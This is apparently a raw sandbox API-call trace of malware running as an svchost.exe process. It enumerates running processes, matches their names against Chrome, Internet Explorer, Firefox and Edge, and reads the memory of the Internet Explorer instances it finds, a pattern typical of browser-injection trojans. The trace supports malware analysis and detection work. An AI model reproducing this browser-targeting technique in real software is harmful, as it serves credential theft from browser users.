	[0254.418] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0254.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xac40
	[0254.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.419] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0254.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.420] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.420] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0254.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.421] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0254.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xac44
	[0254.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.423] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0254.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.423] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.424] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0254.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.425] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0254.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xac48
	[0254.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.426] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0254.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.426] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.427] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0254.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.427] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0254.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xac4c
	[0254.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.429] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0254.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.429] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.430] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0254.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.431] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0254.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xac50
	[0254.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.432] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0254.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.434] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.434] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0254.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.435] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xac54
	[0254.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.436] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.437] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.437] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.437] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.437] NtQueryInformationProcess (in: ProcessHandle=0xac54, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.438] ReadProcessMemory (in: hProcess=0xac54, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.438] ReadProcessMemory (in: hProcess=0xac54, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.438] ReadProcessMemory (in: hProcess=0xac54, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.438] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xac58
	[0254.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.439] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.440] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.440] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.440] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.441] NtQueryInformationProcess (in: ProcessHandle=0xac58, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.441] ReadProcessMemory (in: hProcess=0xac58, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.441] ReadProcessMemory (in: hProcess=0xac58, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.441] ReadProcessMemory (in: hProcess=0xac58, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.441] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xac5c
	[0254.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.444] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.444] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0254.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xac60
	[0254.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.445] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0254.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.446] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.446] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0254.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.446] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xac64
	[0254.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.447] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.448] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.448] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.448] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xac68
	[0254.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.450] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.450] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.451] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.451] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xac6c
	[0254.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.452] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.453] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.453] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.453] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.454] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xac70
	[0254.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.455] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.455] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.455] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.456] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xac74
	[0254.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.457] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.458] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xac78
	[0254.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.459] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.459] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.459] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.460] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xac7c
	[0254.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.461] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.461] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.461] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.462] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xac80
	[0254.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.463] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.464] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.464] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.465] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xac84
	[0254.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.466] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.466] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.466] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.467] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xac88
	[0254.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.468] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.469] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xac8c
	[0254.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.470] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.470] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.470] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.471] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xac90
	[0254.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.472] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.472] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.473] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.473] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xac94
	[0254.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.474] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.474] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.475] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.475] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0254.476] CloseHandle (hObject=0x4fd0) returned 1
	[0254.476] Sleep (dwMilliseconds=0x64) 
	[0254.588] GetCurrentProcessId () returned 0x110
	[0254.588] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
